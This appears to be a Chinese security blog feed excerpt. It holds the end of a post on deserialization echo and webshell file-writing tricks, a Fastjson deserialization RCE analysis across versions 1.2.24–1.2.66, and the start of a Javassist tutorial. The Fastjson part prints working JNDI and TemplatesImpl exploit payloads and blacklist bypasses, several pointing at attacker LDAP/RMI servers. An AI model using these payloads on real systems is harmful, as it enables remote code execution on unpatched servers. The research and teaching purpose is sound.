<p>不再赘述了，具体实现文章都有了。值得一提的思路可能就是反序列化不仅仅可以回显，也可以配合反射和字节码动态注册servlet实现无内存webshell。</p>
<p>在weblogic中也有resp回显，具体代码在 <a class="wp-editor-md-post-content-link" href="https://xz.aliyun.com/t/5299">《weblogic_2019_2725poc与回显构造》</a> lufei师傅已经给出来了</p>
<p>weblogic10.3.6</p>
<pre><code class="language-java line-numbers">String lfcmd = ((weblogic.servlet.internal.ServletRequestImpl)((weblogic.work.ExecuteThread)Thread.currentThread()).getCurrentWork()).getHeader("lfcmd");
weblogic.servlet.internal.ServletResponseImpl response = ((weblogic.servlet.internal.ServletRequestImpl)((weblogic.work.ExecuteThread)Thread.currentThread()).getCurrentWork()).getResponse();
weblogic.servlet.internal.ServletOutputStreamImpl outputStream = response.getServletOutputStream();
outputStream.writeStream(new weblogic.xml.util.StringInputStream(lfcmd));
outputStream.flush();
response.getWriter().write("");
</code></pre>
<p>weblogic12.1.3</p>
<pre><code class="language-java line-numbers">java.lang.reflect.Field field = ((weblogic.servlet.provider.ContainerSupportProviderImpl.WlsRequestExecutor)this.getCurrentWork()).getClass().getDeclaredField("connectionHandler");
field.setAccessible(true);
HttpConnectionHandler httpConn = (HttpConnectionHandler) field.get(this.getCurrentWork());
httpConn.getServletRequest().getResponse().getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream("xxxxxx"));
</code></pre>
<h2>写文件</h2>
<p>通过搜索特殊文件路径直接写入web可访问的目录，要熟悉常用中间件容器的目录结构，比如在我web目录有一个特殊的test.html</p>
<p>linux用bash</p>
<pre><code class="language-bash line-numbers">// 进入test.html的根目录并执行id命令写入1.txt
cd $(find -name "test.html" -type f -exec dirname {} \; | sed 1q) &amp;&amp; echo `id` &gt; 1.txt
</code></pre>
<p><img src="https://y4er.com/img/uploads/20200516003808.png" alt="image.png" /></p>
<p>windows的powershell</p>
<pre><code class="language-powershell line-numbers">$file = Get-ChildItem -Path . -Filter test.html -recurse -ErrorAction SilentlyContinue;$f = -Join($file.DirectoryName,"/a.txt");echo 222 |Out-File $f
</code></pre>
<p><img src="https://y4er.com/img/uploads/20200516009199.png" alt="image.png" /></p>
<h2>dnslog</h2>
<p>这个就不提了，技巧的话就是用powershell或者base64命令编码一下，避免特殊字符，还有就是挑小众的dnslog平台。</p>
<h2>参考</h2>
<ol>
<li>https://www.cnblogs.com/afanti/p/12502145.html</li>
<li>https://xz.aliyun.com/t/5299</li>
<li>https://<span class="wpcom_tag_link"><a href="/tags/java" title="java" target="_blank">java</a></span>sec.org/javase/ClassLoader/</li>
<li>https://www.cnblogs.com/ph4nt0mer/p/12802851.html</li>
</ol>
<p><strong>文笔垃圾，措辞轻浮，内容浅显，操作生疏。不足之处欢迎大师傅们指点和纠正，感激不尽。</strong></p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Fastjson 反序列化RCE分析</title>
		<link>/audit/1525.html</link>
		
		<dc:creator><![CDATA[Y4er]]></dc:creator>
		<pubDate>Sun, 26 Apr 2020 04:40:45 +0000</pubDate>
				<category><![CDATA[代码审计]]></category>
		<category><![CDATA[fastjson]]></category>
		<category><![CDATA[java]]></category>
		<category><![CDATA[rce]]></category>
		<category><![CDATA[反序列化]]></category>
		<guid isPermaLink="false">/?p=1525</guid>

					<description><![CDATA[前言 fastjson是阿里巴巴的一个json库，频频爆RCE。本文分析fastjson至今的一些RCE漏洞。 fastjson的使用 引入库 &#60;dependency&#62;...]]></description>
										<content:encoded><![CDATA[<h2>前言</h2>
<p><span class="wpcom_tag_link"><a href="/tags/fastjson" title="fastjson" target="_blank">fastjson</a></span>是阿里巴巴的一个json库，频频爆RCE。本文分析fastjson至今的一些RCE漏洞。</p>
<h2>fastjson的使用</h2>
<p>引入库</p>
<pre data-language=XML><code class="language-markup ">&lt;dependency&gt;
    &lt;groupId&gt;com.alibaba&lt;/groupId&gt;
    &lt;artifactId&gt;fastjson&lt;/artifactId&gt;
    &lt;version&gt;1.2.24&lt;/version&gt;
&lt;/dependency&gt;
</code></pre>
<p>创建一个实体类User</p>
<pre><code class="language-java ">package org.chabug.fastjson.model;

public class User {
    private int id;
    private int age;
    private String name;

    @Override
    public String toString() {
        return "User{" +
            "id=" + id +
            ", age=" + age +
            ", name='" + name + ''' +
            '}';
    }

    public int getId() {
        return id;
    }

    public void setId(int id) {
        this.id = id;
    }

    public int getAge() {
        return age;
    }

    public void setAge(int age) {
        this.age = age;
    }

    public String getName() {
        return name;
    }

    public void setName(String name) {
        this.name = name;
    }
}
</code></pre>
<p>使用fastjson解析为字符串、从字符串解析为对象：</p>
<pre><code class="language-java ">package org.chabug.fastjson.run;

import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.JSONObject;
import com.alibaba.fastjson.serializer.SerializerFeature;
import org.chabug.fastjson.model.User;

import java.util.HashMap;
import java.util.Map;

public class JSONTest {
    public static void main(String[] args) {
        Map&lt;String, Object&gt; map = new HashMap&lt;String, Object&gt;();
        map.put("key1", "One");
        map.put("key2", "Two");
        String mapJson = JSON.toJSONString(map);
        System.out.println(mapJson);

        System.out.println("--------------------------");


        User user = new User();
        user.setId(1);
        user.setAge(17);
        user.setName("张三");

        // 对象转字符串
        String s1 = JSON.toJSONString(user);
        String s2 = JSON.toJSONString(user, SerializerFeature.WriteClassName);
        System.out.println(s1);
        System.out.println(s2);

        System.out.println("--------------------------");

        // 字符串转对象
        User o1 = (User) JSON.parse(s2);
        System.out.println("o1:"+o1);
        System.out.println(o1.getClass().getName());

        JSONObject o2 = JSON.parseObject(s2);
        System.out.println("o2:"+o2);
        System.out.println(o2.getClass().getName());

        Object o3 = JSON.parseObject(s2, Object.class);
        System.out.println("o3:"+o3);
        System.out.println(o3.getClass().getName());

    }
}
</code></pre>
<p>运行结果</p>
<pre><code class="language-text ">{"key1":"One","key2":"Two"}
--------------------------
{"age":17,"id":1,"name":"张三"}
{"@type":"org.chabug.fastjson.model.User","age":17,"id":1,"name":"张三"}
--------------------------
o1:User{id=1, age=17, name='张三'}
org.chabug.fastjson.model.User
o2:{"name":"张三","id":1,"age":17}
com.alibaba.fastjson.JSONObject
o3:User{id=1, age=17, name='张三'}
org.chabug.fastjson.model.User
</code></pre>
<p>fastjson通过<code>JSON.toJSONString()</code>将对象转为字符串(序列化)，当使用<code>SerializerFeature.WriteClassName</code>参数时会将对象的类名写入<code>@type</code>字段中，在重新转回对象时会根据<code>@type</code>来指定类，进而调用该类的<code>set</code>、<code>get</code>方法。因为这个特性，我们可以指定<code>@type</code>为任意存在问题的类，造成一些问题。</p>
<p>在字符串转对象的过程中(<span class="wpcom_tag_link"><a href="/tags/%e5%8f%8d%e5%ba%8f%e5%88%97%e5%8c%96" title="反序列化" target="_blank">反序列化</a></span>)，主要使用<code>JSON.parse()</code>和<code>JSON.parseObject()</code>两个方法，两者区别在于<code>parse()</code>会返回实际类型(User)的对象，而<code>parseObject()</code>在不指定class时返回的是<code>JSONObject</code>，指定class才会返回实际类型(User)的对象，也就是<code>JSON.parseObject(s2)</code>和<code>JSON.parseObject(s2, Object.class)</code>的区别，这里也可以指定为<code>User.class</code>。</p>
<p>我们再来看<code>@type</code>的问题，我定义了一个Evil类，在其set方法中可以执行命令</p>
<pre><code class="language-java ">package org.chabug.fastjson.model;

import java.io.IOException;

public class Evil {
    private String cmd;

    public String getCmd() {
        System.out.println("getCmd()");
        return cmd;
    }

    public void setCmd(String cmd) {
        System.out.println("setCmd()");
        this.cmd = cmd;
        try {
            Runtime.getRuntime().exec(cmd);
        } catch (IOException e) {
            e.printStackTrace();
        }
    }

    public Evil() {
        System.out.println("Evil()");
    }
}
</code></pre>
<p>用springboot起了一个web<br />
<img src="https://y4er.com/img/uploads/20200426110221.png" alt="image.png" /></p>
<p>成功弹出了计算器<br />
<img src="/wp-content/uploads/2020/04/20200426112943.png" alt="image.png" /></p>
<p>我们通过控制<code>@type</code>来实现反序列化恶意Evil类，从而RCE，很简单只是举个例子说明<code>@type</code>的使用。</p>
<p>那么到这里还有一个问题，为什么写在<code>setCmd</code>方法会自动调用呢？</p>
<h2>setter、getter、is自动调用</h2>
<p>对应的Evil<br />
<img src="/wp-content/uploads/2020/04/20200426112989.png" alt="image.png" /></p>
<p>写一个test测试下<br />
<img src="/wp-content/uploads/2020/04/20200426117757.png" alt="image.png" /></p>
<p>可以看到<code>parseObject(evil)</code>的get、set、构造方法都自动调用了，另外两种解析方式只调用了set、构造方法。</p>
<p>在前文中我们知道<code>parseObject(evil)</code>返回的是<code>JSONObject</code>对象，跟进其方法发现也是使用parse解析的，但是多了一个<code>(JSONObject)toJSON(obj)</code><br />
<img src="/wp-content/uploads/2020/04/20200426110951.png" alt="image.png" /><br />
这个方法调用的get，堆栈如下</p>
<pre><code class="language-text ">getCmd:11, Evil (org.chabug.fastjson.model)
invoke0:-1, NativeMethodAccessorImpl (sun.reflect)
invoke:62, NativeMethodAccessorImpl (sun.reflect)
invoke:43, DelegatingMethodAccessorImpl (sun.reflect)
invoke:498, Method (java.lang.reflect)
get:451, FieldInfo (com.alibaba.fastjson.util)
getPropertyValue:105, FieldSerializer (com.alibaba.fastjson.serializer)
getFieldValuesMap:439, JavaBeanSerializer (com.alibaba.fastjson.serializer)
toJSON:902, JSON (com.alibaba.fastjson)
toJSON:824, JSON (com.alibaba.fastjson)
parseObject:206, JSON (com.alibaba.fastjson)
main:13, Test (org.chabug.fastjson.run)
</code></pre>
<p>比较简单，不详细分析，大致就是通过反射调用getter方法获取字段的值存入hashmap。那么setter在哪调用的？</p>
<p>在<code>com.alibaba.fastjson.util.JavaBeanInfo#build</code>中</p>
<p><img src="/wp-content/uploads/2020/04/20200426115009.png" alt="image.png" /></p>
<p>在通过<code>@type</code>拿到类之后，通过反射拿到该类所有的方法存入methods，接下来遍历methods进而获取get、set方法，如上图。总结set方法自动调用的条件为：<br />
1. 方法名长度大于4<br />
2. 非静态方法<br />
3. 返回值为void或当前类<br />
4. 方法名以set开头<br />
5. 参数个数为1</p>
<p>当满足条件之后会从方法名截取属性名，截取时会判断<code>_</code>，如果是<code>set_name</code>会截取为<code>name</code>属性，具体逻辑如下：<br />
<img src="/wp-content/uploads/2020/04/20200426118528.png" alt="image.png" /></p>
<p>当截取完但是找不到这个属性<br />
<img src="/wp-content/uploads/2020/04/20200426113707.png" alt="image.png" /></p>
<p>会判断传入的第一个参数类型是否为布尔型，是的话就在截取完的变量前加上<code>is</code>，截取propertyName的第一个字符转大写和第二个字符，并且然后重新尝试获取属性字段。</p>
<p>比如：public boolean setBoy(boolean t) 会寻找<code>isBoy</code>字段。</p>
<p>set的整个判断就是：如果有setCmd()会绑定cmd属性，如果该类没有cmd属性会绑定isCmd属性。</p>
<p>get的判断<br />
<img src="/wp-content/uploads/2020/04/20200426119593.png" alt="image.png" /><br />
总结下就是：<br />
1. 方法名长度大于等于4<br />
2. 非静态方法<br />
3. 以get开头且第4个字母为大写<br />
4. 无传入参数<br />
5. 返回值类型继承自Collection Map AtomicBoolean AtomicInteger AtomicLong</p>
<p>当程序绑定了对应的字段之后，如果传入json字符串的键值中存在这个值，就会去调用执行对应的setter、构造方法。</p>
<p>小结：<br />
1. parse(jsonStr) 构造方法+Json字符串指定属性的setter()+特殊的getter()<br />
2. parseObject(jsonStr) 构造方法+Json字符串指定属性的setter()+所有getter() 包括不存在属性和私有属性的getter()<br />
3. parseObject(jsonStr,Object.class) 构造方法+Json字符串指定属性的setter()+特殊的getter()</p>
<h2>fastjson漏洞历程</h2>
<p>fastjson漏洞经历了多次绕过及修复，甚至出现了加密黑名单防止安全研究= =</p>
<h3>1.2.22-1.2.24</h3>
<p>在小于fastjson1.2.22-1.2.24版本中有两条利用链。<br />
1. JNDI <code>com.sun.rowset.JdbcRowSetImpl</code><br />
2. JDK7u21 <code>com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl</code></p>
<h4>JNDI利用链</h4>
<p>JNDI传输过程中使用的就是序列化和反序列化，所以通杀三种解析方式</p>
<pre><code class="language-java ">JSON.parse(evil);
JSON.parseObject(evil);
JSON.parseObject(evil, Object.class);
</code></pre>
<p>原理就是setter的自动调用</p>
<pre><code class="language-java ">package org.chabug.fastjson.run;

import com.sun.rowset.JdbcRowSetImpl;

import java.sql.SQLException;

public class Test {
    public static void main(String[] args) {


        JdbcRowSetImpl jdbcRowSet = new JdbcRowSetImpl();
        try {
            jdbcRowSet.setDataSourceName("ldap://localhost:1389/#Calc");
            jdbcRowSet.setAutoCommit(true);
        } catch (SQLException e) {
            e.printStackTrace();
        }
    }
}
</code></pre>
<p><img src="/wp-content/uploads/2020/04/20200426110423.png" alt="image.png" /></p>
<p>setDataSou<span class="wpcom_tag_link"><a href="/tags/rce" title="rce" target="_blank">rce</a></span>Name()和setAutoCommit()满足setter自动调用的条件，当我们传入对应json键值对时就会触发setter，进而触发jndi链接。payload如下</p>
<pre><code class="language-json ">{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://localhost:1389/#Calc", "autoCommit":true}
</code></pre>
<h4>TemplatesImpl利用链</h4>
<p>条件苛刻<br />
1. 服务端使用parseObject()时，必须使用如下格式才能触发漏洞：<code>JSON.parseObject(input, Object.class, Feature.SupportNonPublicField)</code><br />
2. 服务端使用parse()时，需要<code>JSON.parse(text1,Feature.SupportNonPublicField)</code></p>
<p>poc</p>
<pre><code class="language-java ">package org.chabug.fastjson.run;

import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.parser.Feature;
import com.alibaba.fastjson.parser.ParserConfig;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import javassist.ClassPool;
import javassist.CtClass;
import org.apache.tomcat.util.codec.binary.Base64;

public class JDK7u21 {
    // 参考https://y4er.com/post/ysoserial-commonscollections-2/
    public static byte[] getevilbyte() throws Exception {
        ClassPool pool = ClassPool.getDefault();
        CtClass cc = pool.get(test.class.getName());
        String cmd = "java.lang.Runtime.getRuntime().exec("calc");";
        cc.makeClassInitializer().insertBefore(cmd);
        String randomClassName = "Y4er" + System.nanoTime();
        cc.setName(randomClassName);
        cc.setSuperclass((pool.get(AbstractTranslet.class.getName())));

        return cc.toBytecode();
    }


    //main函数调用以下poc而已
    public static void main(String args[]) {
        try {
            byte[] evilCode = getevilbyte();
            String evilCode_base64 = Base64.encodeBase64String(evilCode);
            final String NASTY_CLASS = "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl";
            String text1 = "{"@type":"" + NASTY_CLASS + "","_bytecodes":["" + evilCode_base64 + ""],'_name':'asd','_tfactory':{ },"_outputProperties":{ }," + ""_version":"1.0","allowedProtocols":"all"}n";
            System.out.println(text1);
            ParserConfig config = new ParserConfig();
            Object obj = JSON.parseObject(text1, Object.class, config, Feature.SupportNonPublicField);

        } catch (Exception e) {
            e.printStackTrace();
        }
    }

    public static class test {

    }
}
</code></pre>
<p>看完poc应该考虑的几个问题：<br />
1. 为什么<code>parseObject</code>需要<code>Feature.SupportNonPublicField</code>？<br />
2. 为什么需要<code>_outputProperties</code>属性？<br />
3. <code>_bytecodes</code>为什么需要base64编码？<br />
4. <code>_tfactory</code>为什么为{}？</p>
<p><strong>问题1：<code>Feature.SupportNonPublicField</code></strong><br />
在fastjson中默认并不能序列化private属性，而我们使用的<code>TemplatesImpl</code>利用链的多个属性都是private，所以在反序列化的时候需要加上<code>Feature.SupportNonPublicField</code>，这也成了这个利用链的最大限制。<br />
<img src="/wp-content/uploads/2020/04/20200426119442.png" alt="image.png" /></p>
<p><strong>问题2：为什么需要<code>_outputProperties</code>属性</strong><br />
答案是为了触发<code>getOutputProperties()</code>。再问：如果getOutputProperties()是_outputProperties属性的getter方法那不符合规则啊！下面就来分析下：</p>
<p>getOutputProperties()方法其对应的属性应该为<code>public</code>的<code>outputProperties</code>，其实你删了<code>_</code>也可以，<code>_</code>并不是必须的，那么fastjson到底是怎么处理的呢？<br />
<img src="/wp-content/uploads/2020/04/20200426114018.png" alt="image.png" /></p>
<p>在<code>com.alibaba.fastjson.parser.deserializer.JavaBeanDeserializer#parseField</code>中解析每一个字段时，会进行一次灵活匹配<code>this.smartMatch()</code><br />
<img src="/wp-content/uploads/2020/04/20200426119256.png" alt="image.png" /><br />
在进行is关键字判断之后，替换掉<code>-</code>和<code>_</code>再匹配getter和setter<br />
<img src="/wp-content/uploads/2020/04/20200426111692.png" alt="image.png" /><br />
所以就会调用<code>getOutputProperties()</code><br />
<img src="/wp-content/uploads/2020/04/20200426116858.png" alt="image.png" /><br />
而其返回值又是Properties，所以可以完美调用<code>getOutputProperties()</code>，进而触发<code>newTransformer()</code>-><code>getTransletInstance()</code>-><code>newInstance()</code>，导致RCE。</p>
<p><strong>问题3：<code>_bytecodes</code>为什么需要base64编码</strong></p>
<p>在解析byte[]的时候进行了base64解码<br />
<img src="/wp-content/uploads/2020/04/20200426117322.png" alt="image.png" /></p>
<p>跟进<br />
<img src="/wp-content/uploads/2020/04/20200426115663.png" alt="image.png" /></p>
<p><strong>问题4：_tfactory为什么为{}</strong><br />
在<code>fastjson-1.2.23.jar!/com/alibaba/fastjson/parser/deserializer/JavaBeanDeserializer.class:579</code>解析字段值时，会自动判断传入键值是否为空，如果为空会根据类属性定义的类型自动创建实例<br />
<img src="/wp-content/uploads/2020/04/20200426117245.png" alt="image.png" /></p>
<p>到这算是把fastjson写的差不多，剩下的就是无尽的bypass。</p>
<h3>1.2.25-1.2.41</h3>
<p>在1.2.25版本中，重新使用jdbc利用链复现报错<br />
<img src="/wp-content/uploads/2020/04/20200426118908.png" alt="image.png" /></p>
<p>使用idea对比两个jar包发现改为了checkAutoType()方法<br />
<img src="/wp-content/uploads/2020/04/20200426110544.png" alt="image.png" /></p>
<p>跟进checkAutoType()发现<br />
<img src="/wp-content/uploads/2020/04/20200426116206.png" alt="image.png" /></p>
<p>增加了类前缀黑名单白名单判断，在1.2.25版本中AutoTypeSupport默认false，需要显示关闭白名单</p>
<pre><code class="language-java ">ParserConfig.getGlobalInstance().setAutoTypeSupport(true);
</code></pre>
<p>在关闭了AutoTypeSupport之后仍然需要绕过黑名单，以startsWith判断<br />
<img src="/wp-content/uploads/2020/04/20200426117781.png" alt="image.png" /><br />
但是在跟了TypeUtils.loadClass()之后会发现<br />
<img src="/wp-content/uploads/2020/04/20200426110879.png" alt="image.png" /><br />
如果classname以<code>[</code>开头loadClass会自动去掉，还有就是开头<code>L</code>结尾<code>;</code>的也会去掉，那么我们有了新的绕过方法：</p>
<pre><code class="language-java ">ParserConfig.getGlobalInstance().setAutoTypeSupport(true); // 必须显示关闭白名单
{"@type":"Lcom.sun.rowset.JdbcRowSetImpl;","dataSourceName":"ldap://localhost:1389/#Calc", "autoCommit":true}
</code></pre>
<p>7u21的链同理，在1.2.25之后所谓的绕过都是在显示关闭白名单的条件下绕过的。</p>
<h3>1.2.42绕过</h3>
<p>在1.2.41中<code>L;</code>的方法测试可以，1.2.42中不行<br />
<img src="/wp-content/uploads/2020/04/20200426118932.png" alt="image.png" /></p>
<p>对比jar发现ParserConfig中黑名单改为hash<br />
<img src="/wp-content/uploads/2020/04/20200426114517.png" alt="image.png" /><br />
classname截取<code>L;</code><br />
<img src="/wp-content/uploads/2020/04/20200426115617.png" alt="image.png" /></p>
<p>通过计算hash让我们不知道黑名单是什么类，但是加密方式在<code>com.alibaba.fastjson.util.TypeUtils#fnv1a_64</code>是有的<br />
<img src="/wp-content/uploads/2020/04/20200426116258.png" alt="image.png" /><br />
通过变量常用的jar、类、字符串碰撞hash得到黑名单，有一个项目已经做好了：https://github.com/LeadroyaL/fastjson-blacklist</p>
<p>绕过也比较简单，<code>com.alibaba.fastjson.parser.ParserConfig#checkAutoType</code>截取一次，<code>com.alibaba.fastjson.util.TypeUtils#loadClass</code>截取一次，那么双写就可以绕过</p>
<pre><code class="language-json ">{"@type":"LLcom.sun.rowset.JdbcRowSetImpl;;","dataSourceName":"ldap://localhost:1389/#Calc", "autoCommit":true}
</code></pre>
<h3>1.2.43</h3>
<p>判断了是否以<code>LL</code>开头，直接抛出异常<br />
<img src="/wp-content/uploads/2020/04/20200426118900.png" alt="image.png" /></p>
<p>但是<code>[</code>还可以</p>
<pre><code class="language-json ">{"@type":"[com.sun.rowset.JdbcRowSetImpl"[{"dataSourceName":"ldap://localhost:1389/Exploit", "autoCommit":true}
</code></pre>
<h3>1.2.44</h3>
<p>修复之前<code>[</code>的问题，虽然之前<code>[</code>是不能用的</p>
<h3>1.2.45</h3>
<p>增加了黑名单</p>
<pre><code class="language-java ">//需要有第三方组件ibatis-core 3:0
{"@type":"org.apache.ibatis.datasource.jndi.JndiDataSourceFactory","properties":{"data_source":"rmi://localhost:1099/Exploit"}}
</code></pre>
<h3>1.2.47 通杀</h3>
<p>通杀autotype和黑名单</p>
<pre><code class="language-json ">{
    "a": {
        "@type": "java.lang.Class", 
        "val": "com.sun.rowset.JdbcRowSetImpl"
    }, 
    "b": {
        "@type": "com.sun.rowset.JdbcRowSetImpl", 
        "dataSourceName": "ldap://localhost:1389/Exploit", 
        "autoCommit": true
    }
}
</code></pre>
<p>在TypeUtils的static初始化时调用<code>com.alibaba.fastjson.util.TypeUtils#addBaseClassMappings</code>中会将常用的类通过loadclass()放入mapping中</p>
<pre><code class="language-java ">private static void addBaseClassMappings() {
    mappings.put("byte", Byte.TYPE);
    mappings.put("short", Short.TYPE);
    mappings.put("int", Integer.TYPE);
    mappings.put("long", Long.TYPE);
    mappings.put("float", Float.TYPE);
    mappings.put("double", Double.TYPE);
    mappings.put("boolean", Boolean.TYPE);
    mappings.put("char", Character.TYPE);
    mappings.put("[byte", byte[].class);
    mappings.put("[short", short[].class);
    mappings.put("[int", int[].class);
    mappings.put("[long", long[].class);
    mappings.put("[float", float[].class);
    mappings.put("[double", double[].class);
    mappings.put("[boolean", boolean[].class);
    mappings.put("[char", char[].class);
    mappings.put("[B", byte[].class);
    mappings.put("[S", short[].class);
    mappings.put("[I", int[].class);
    mappings.put("[J", long[].class);
    mappings.put("[F", float[].class);
    mappings.put("[D", double[].class);
    mappings.put("[C", char[].class);
    mappings.put("[Z", boolean[].class);
    Class&lt;?&gt;[] classes = new Class[]{Object.class, Cloneable.class, loadClass("java.lang.AutoCloseable"), Exception.class, RuntimeException.class, IllegalAccessError.class, IllegalAccessException.class, IllegalArgumentException.class, IllegalMonitorStateException.class, IllegalStateException.class, IllegalThreadStateException.class, IndexOutOfBoundsException.class, InstantiationError.class, InstantiationException.class, InternalError.class, InterruptedException.class, LinkageError.class, NegativeArraySizeException.class, NoClassDefFoundError.class, NoSuchFieldError.class, NoSuchFieldException.class, NoSuchMethodError.class, NoSuchMethodException.class, NullPointerException.class, NumberFormatException.class, OutOfMemoryError.class, SecurityException.class, StackOverflowError.class, StringIndexOutOfBoundsException.class, TypeNotPresentException.class, VerifyError.class, StackTraceElement.class, HashMap.class, Hashtable.class, TreeMap.class, IdentityHashMap.class, WeakHashMap.class, LinkedHashMap.class, HashSet.class, LinkedHashSet.class, TreeSet.class, TimeUnit.class, ConcurrentHashMap.class, loadClass("java.util.concurrent.ConcurrentSkipListMap"), loadClass("java.util.concurrent.ConcurrentSkipListSet"), AtomicInteger.class, AtomicLong.class, Collections.EMPTY_MAP.getClass(), BitSet.class, Calendar.class, Date.class, Locale.class, UUID.class, Time.class, java.sql.Date.class, Timestamp.class, SimpleDateFormat.class, JSONObject.class};
    Class[] var1 = classes;
    int var2 = classes.length;

    int var3;
    for(var3 = 0; var3 &lt; var2; ++var3) {
        Class clazz = var1[var3];
        if (clazz != null) {
            mappings.put(clazz.getName(), clazz);
        }
    }

    String[] awt = new String[]{"java.awt.Rectangle", "java.awt.Point", "java.awt.Font", "java.awt.Color"};
    String[] spring = awt;
    var3 = awt.length;

    int var11;
    for(var11 = 0; var11 &lt; var3; ++var11) {
        String className = spring[var11];
        Class&lt;?&gt; clazz = loadClass(className);
        if (clazz == null) {
            break;
        }

        mappings.put(clazz.getName(), clazz);
    }

    spring = new String[]{"org.springframework.util.LinkedMultiValueMap", "org.springframework.util.LinkedCaseInsensitiveMap", "org.springframework.remoting.support.RemoteInvocation", "org.springframework.remoting.support.RemoteInvocationResult", "org.springframework.security.web.savedrequest.DefaultSavedRequest", "org.springframework.security.web.savedrequest.SavedCookie", "org.springframework.security.web.csrf.DefaultCsrfToken", "org.springframework.security.web.authentication.WebAuthenticationDetails", "org.springframework.security.core.context.SecurityContextImpl", "org.springframework.security.authentication.UsernamePasswordAuthenticationToken", "org.springframework.security.core.authority.SimpleGrantedAuthority", "org.springframework.security.core.userdetails.User"};
    String[] var10 = spring;
    var11 = spring.length;

    for(int var12 = 0; var12 &lt; var11; ++var12) {
        String className = var10[var12];
        Class&lt;?&gt; clazz = loadClass(className);
        if (clazz == null) {
            break;
        }

        mappings.put(clazz.getName(), clazz);
    }

}
</code></pre>
<p>然后开始解析json，当传入type时进入checkAutoType()检查类<br />
<img src="/wp-content/uploads/2020/04/20200426116782.png" alt="image.png" /></p>
<p>在调用解析时我们没有传入预期的反序列化对象的对应类名时，会从mapping中或者deserializers.findClass()寻找<br />
<img src="/wp-content/uploads/2020/04/20200426114621.png" alt="image.png" /><br />
当找到类之后会直接return class，不会再进行autotype和黑名单校验，而在deserializers中有<code><span class="wpcom_tag_link"><a href="/tags/java" title="java" target="_blank">java</a></span>.lang.Class</code><br />
<img src="/wp-content/uploads/2020/04/20200426115596.png" alt="image.png" /></p>
<p>继续解析<br />
<img src="/wp-content/uploads/2020/04/20200426117492.png" alt="image.png" /></p>
<p>获取到java.lang.class对应的反序列化处理类<code>com.alibaba.fastjson.serializer.MiscCodec</code>，然后开始deserializer.deserialze()反序列化<br />
<img src="/wp-content/uploads/2020/04/20200426111709.png" alt="image.png" /><br />
parser.parse()获取val的值<br />
<img src="/wp-content/uploads/2020/04/20200426116949.png" alt="image.png" /><br />
赋值给strVal，然后经过一系列判断之后<br />
<img src="/wp-content/uploads/2020/04/20200426113708.png" alt="image.png" /><br />
传入TypeUtils.loadClass()</p>
<p>在loadclass中将strVal加入到mapping中<br />
<img src="/wp-content/uploads/2020/04/20200426118022.png" alt="image.png" /></p>
<p>此时mapping中有了jdbc的类名，而Mappings是ConcurrentMap类的，顾名思义就是在当前连接会话生效。所以我们需要在一次连接会话同时传入两个json键值对时，此次连接未断开时，继续解析第二个json键值对，然后和上文中提到的一样，在校验autotype和黑名单之前就已经return了clazz，变相绕过了黑名单，利用JNDI注入RCE。</p>
<h3>1.2.48</h3>
<p>黑名单多了两条，MiscCodec中将默认传入的cache变为false，checkAutoType()调整了逻辑</p>
<h3>1.2.62</h3>
<p>黑名单绕过</p>
<pre><code class="language-json ">{"@type":"org.apache.xbean.propertyeditor.JndiConverter","AsText":"rmi://127.0.0.1:1099/exploit"}";
</code></pre>
<h3>1.2.66</h3>
<p>也是黑名单绕过</p>
<pre><code class="language-java ">// 需要autotype true
{"@type":"org.apache.shiro.jndi.JndiObjectFactory","resourceName":"ldap://192.168.80.1:1389/Calc"}
{"@type":"br.com.anteros.dbcp.AnterosDBCPConfig","metricRegistry":"ldap://192.168.80.1:1389/Calc"}
{"@type":"org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup","jndiNames":"ldap://192.168.80.1:1389/Calc"}
{"@type":"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig","properties": {"@type":"java.util.Properties","UserTransaction":"ldap://192.168.80.1:1389/Calc"}}
</code></pre>
<h2>总结</h2>
<p>从<code>@type</code>属性牵扯出来一系列的RCE，整个过程分析下来还是很有收获，不停的bypass才是反序列化的最大乐趣。</p>
<h2>参考链接</h2>
<ol>
<li>https://www.anquanke.com/post/id/181874</li>
<li>https://xz.aliyun.com/t/7027</li>
<li><a class="wp-editor-md-post-content-link" href="https://www.kingkk.com/2019/07/Fastjson%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E-1-2-24-1-2-48/">Fastjson反序列化漏洞 1.2.24-1.2.48</a></li>
<li>https://mp.weixin.qq.com/s/i7-g89BJHIYTwaJbLuGZcQ</li>
</ol>
<p><strong>文笔垃圾，措辞轻浮，内容浅显，操作生疏。不足之处欢迎大师傅们指点和纠正，感激不尽。</strong></p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Javassist 学习</title>
		<link>/audit/1511.html</link>
		
		<dc:creator><![CDATA[Y4er]]></dc:creator>
		<pubDate>Mon, 20 Apr 2020 04:43:34 +0000</pubDate>
				<category><![CDATA[代码审计]]></category>
		<category><![CDATA[java]]></category>
		<category><![CDATA[Javassist]]></category>
		<category><![CDATA[字节码]]></category>
		<guid isPermaLink="false">/?p=1511</guid>

					<description><![CDATA[前言 Java中所有的类都被编译为class文件来运行，在编译完class文件之后，类不能再被显示修改，而Javassist就是用来处理编译后的class文件，它可以用来修改方法或...]]></description>
										<content:encoded><![CDATA[<h2>前言</h2>
<p>Java中所有的类都被编译为class文件来运行，在编译完class文件之后，类不能再被显示修改，而<code><span class="wpcom_tag_link"><a href="/tags/javassist" title="Javassist" target="_blank">Javassist</a></span></code>就是用来处理编译后的class文件，它可以用来修改方法或者新增方法，并且不需要深入了解<span class="wpcom_tag_link"><a href="/tags/%e5%ad%97%e8%8a%82%e7%a0%81" title="字节码" target="_blank">字节码</a></span>，还可以生成一个新的类对象。</p>
<h2>创建class</h2>
<p>创建maven项目，引入Javassist库</p>
<pre data-language=XML><code class="language-markup ">&lt;!-- https://mvnrepository.com/artifact/javassist/javassist --&gt;
        &lt;dependency&gt;
            &lt;groupId&gt;javassist&lt;/groupId&gt;
            &lt;artifactId&gt;javassist&lt;/artifactId&gt;
            &lt;version&gt;3.12.1.GA&lt;/version&gt;
        &lt;/dependency&gt;
</code></pre>
